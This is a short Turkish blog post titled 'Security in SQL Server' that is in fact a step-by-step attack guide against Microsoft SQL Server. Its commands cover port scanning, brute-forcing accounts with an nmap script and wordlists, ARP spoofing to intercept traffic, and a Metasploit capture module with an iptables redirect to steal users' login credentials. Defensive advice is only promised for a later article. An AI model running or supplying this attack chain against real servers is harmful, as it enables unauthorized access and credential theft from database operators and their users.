Sql Server’da Güvenlik



Sql Server’da Güvenlik

 

Microsoft SQL Server 1433 numaralı port üzerinden çalışır. Bazı yazılımcılar farklı portlar kullanabilirler. Eğer diğer portları bulmak istiyorsanız NMAP‘i(Güvenlik tarayıcısı) kullanabilirsiniz. Örnek verecek olursak;


$ nmap -n <“IP”> -p “PORT” (Bu kod ile port üzerindeki server hakkında bilgi alınabilir)

$ nmap -p “PORT” –script ms-sql-info <“IP”> (Detaylı Bilgi Almak için kullanılır)

$ nmap -p <PORT> –script ms-sql-brute –script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <“IP”>  (Ip’deki server’a ait account bilgilerine sahipr olmak gerekmektedir bu şekilde user ve password’e ulaşılabilinir.)

$ echo 1 > /proc/sys/net/ipv4/ip_forward (Ip Yönlendirmesi yapıyoruz, Kali Linux işletim sisteminde bulunan “arpspoof” ile hedef ve sunucu arasına girilmiş oldu. )

 Sırası ile yapınız



$ arpspoof -i eth0 -t <SQL SERVER IP> <“Kurban IP”>

$ arpspoof -i eth0 -t <“Saldırı Yapılacak IP”> <“Saldırı Yapılacak IP”>







$ use auxiliary/server/capture/mssql

$ set SRVPORT “PORT”

$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 –dport “PORT” -j REDIRECT –to-ports “PORT” (Saldırılan hesap bilgilerini girdiğinde yazılım hesap bilgilerini yakalayıp bize verecek ve saldırdığımız Server’a kullanıcı giriş yapmak istediğinde Additional Information hatası alacak )


Diğer makalemde size daha detaylı DB Saldırılarını bunun önüne nasıl geçebileceğinizi ve database’inizi nasıl koruyacağınızı anlatacağım Esen kalın.

 

 


Emoji olarak yorumla :)
eh işte! eh işte!
0
eh işte!
Harika Harika
0
Harika
Hahaha! Hahaha!
0
Hahaha!
Vay be! Vay be!
0
Vay be!
Şekilsin Şekilsin
0
Şekilsin
Muhteşem Muhteşem
1
Muhteşem
Beğendim Beğendim
0
Beğendim
Beğenmedim Beğenmedim
0
Beğenmedim

Sql Server’da Güvenlik

Giriş Yap

Hoşgeldin, sefa getirdin :)

Şifre Sıfırla

Şifreni bidaha unutma lütfen :)

Geri git :
Giriş Yap